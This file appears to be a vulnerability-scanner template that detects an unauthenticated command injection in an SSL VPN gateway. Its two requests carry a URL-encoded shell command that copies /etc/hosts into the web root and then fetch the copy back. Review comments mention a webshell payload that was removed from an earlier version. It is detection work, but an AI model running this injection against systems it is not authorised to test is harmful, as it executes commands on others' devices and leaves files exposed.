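id: multi-sslvpn-gateway-rce

info:
  name: Multiple Security Gateway Frontend RCE
  author: Esonhugh-self-maintained
  severity: critical
  description: |
    Unauthenticated OS command injection through the `img` parameter of
    /sslvpn/sslvpn_client.php (client=logoImg). The injected command copies
    /etc/hosts into the web root and the template then fetches that copy, so
    a match is proof of command execution rather than of a reflected parameter.

    NOTE(review): the original version of this template went on to plant a
    PHP webshell (main_logo_helper.php containing @eval($_REQUEST["pass"]))
    on every host it confirmed and dumped the response body. A detection
    template must never leave an unauthenticated, persistent backdoor on a
    target, so that stage has been removed. The remaining check still writes
    a file (main_logo21.txt) into the target's web root; the template is
    therefore tagged intrusive, must only be run against assets you are
    authorised to test, and the artifact should be removed afterwards.
    It also previously reported a match on a bare HTTP 200 from the
    endpoint, which is a false positive for a "critical" finding; every
    request now requires all of its matchers to hold.
  reference:
    - "https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Multiple-Security-Gateway-Frontend-RCE.json"
  tags: rce,shell,php,sslvpn,intrusive

requests:
  # Stage 1 - inject the command. Decoded, the `img` value is:
  #   <randstr> /tmp || cp /etc/hosts /usr/local/webui/webui/images/basic/login/main_logo21.txt || ls
  # The random token being echoed back only shows the parameter is reflected,
  # not that the shell ran; stage 2 is what actually confirms execution.
  - method: GET
    path:
      - "{{BaseURL}}/sslvpn/sslvpn_client.php?client=logoImg&img={{randstr}}%20%2f%74%6d%70%20%7c%7c%20%63%70%20%2f%65%74%63%2f%68%6f%73%74%73%20%2f%75%73%72%2f%6c%6f%63%61%6c%2f%77%65%62%75%69%2f%77%65%62%75%69%2f%69%6d%61%67%65%73%2f%62%61%73%69%63%2f%6c%6f%67%69%6e%2f%6d%61%69%6e%5f%6c%6f%67%6f%32%31%2e%74%78%74%20%7c%7c%20%6c%73"
    headers:
      Connection: close
      Upgrade-Insecure-Requests: "1"
      User-Agent: Mozilla/5.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: navigate
      Sec-Fetch-User: "?1"
      Sec-Fetch-Dest: iframe
      Referer: "{{BaseURL}}"
      Accept-Encoding: gzip, deflate
      Accept-Language: zh-CN,zh;q=0.9
      Content-Type: application/x-www-form-urlencoded
    redirects: true
    # Both conditions must hold; a 200 on its own is not a finding.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "{{randstr}}"

  # Stage 2 - read back the file the injected `cp` created. /etc/hosts is
  # expected to contain "localhost"; seeing it at this path proves the
  # command ran on the gateway.
  # TODO(review): this leaves main_logo21.txt (a copy of /etc/hosts) readable
  # in the target's web root; clean it up after a confirmed finding.
  - method: GET
    path:
      - "{{BaseURL}}/webui/images/basic/login/main_logo21.txt"
    headers:
      Connection: close
      Upgrade-Insecure-Requests: "1"
      User-Agent: Mozilla/5.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: navigate
      Sec-Fetch-User: "?1"
      Sec-Fetch-Dest: iframe
      Referer: "{{BaseURL}}"
      Accept-Encoding: gzip, deflate
      Accept-Language: zh-CN,zh;q=0.9
      Content-Type: application/x-www-form-urlencoded
    redirects: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "localhost"

# NOTE(review): the previous template signature ("# digest: ...") was dropped
# because the body has changed and the old digest would no longer verify;
# re-sign the template before distributing it.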